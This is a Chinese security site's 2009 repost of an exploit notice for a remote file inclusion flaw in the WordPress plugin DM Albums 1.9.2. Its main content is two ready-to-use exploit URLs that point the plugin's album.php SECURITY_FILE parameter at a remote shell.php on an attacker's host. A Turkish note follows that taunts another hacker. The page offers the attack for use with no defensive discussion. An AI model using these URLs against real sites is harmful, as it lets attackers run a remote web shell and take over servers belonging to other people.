频道栏目
首页 > 安全 > 网站安全 > 正文

WordPress 插件DM相册1.9.2 远程文件包含漏洞

2009-06-30 08:14:38           
收藏   我要投稿

本文章可以合作者在此交流:http://bbs.2cto.com/read.php?tid=89415

作者:Crackkey  转载请注明来自红色黑客联盟(www.2cto.com

#############################################################################################
[+] DM Albums™ 1.9.2 & WordPress Plug-in Remote File Include Vulnerability
[+] Author : Septemb0x
[+] www.Cyber-Warrior.Org - Information Technologys World
[+] Greetz : BARCOD3 And All Friends...
[+] Dork : Yok Dork Mork :D
[+] Download Script : http://wordpress.org/extend/plugins/dm-albums/
#############################################################################################
[+] NORMAL EXPLOIT;
[+] http://[sitename]/[path]/template/album.php?SECURITY_FILE=http://attackersite/shell.php
[+] WORDPRESS EXPLOIT
[+] http://[sitename]/[path]/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://attackersite/shell.php
#############################################################################################
< ---- Note ---- >
H....R;
Sen çok üstün zekaya sahip birisin,
emin olbilirsin, :D
Sql injection ile domain hackleyebilen tek lamersin, :D
ASPde Rfi Bulmakta Birebirsin,
Ama Gördüğüm En hıyar Lamersin :D
Bu Kafiyelerde Bi Tarafına Girsin ;)
Lol H....R :D
< ---- Note Finished ---- >
# CrackkeyNet 2009.06.29
  vcking.cn">http://www.fvcking.cn

上一篇:PHP Input/Ouput Wrapper远程包含函数命令执行漏洞
下一篇:Joomla com_bookflip(book_id) Sql 注射
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站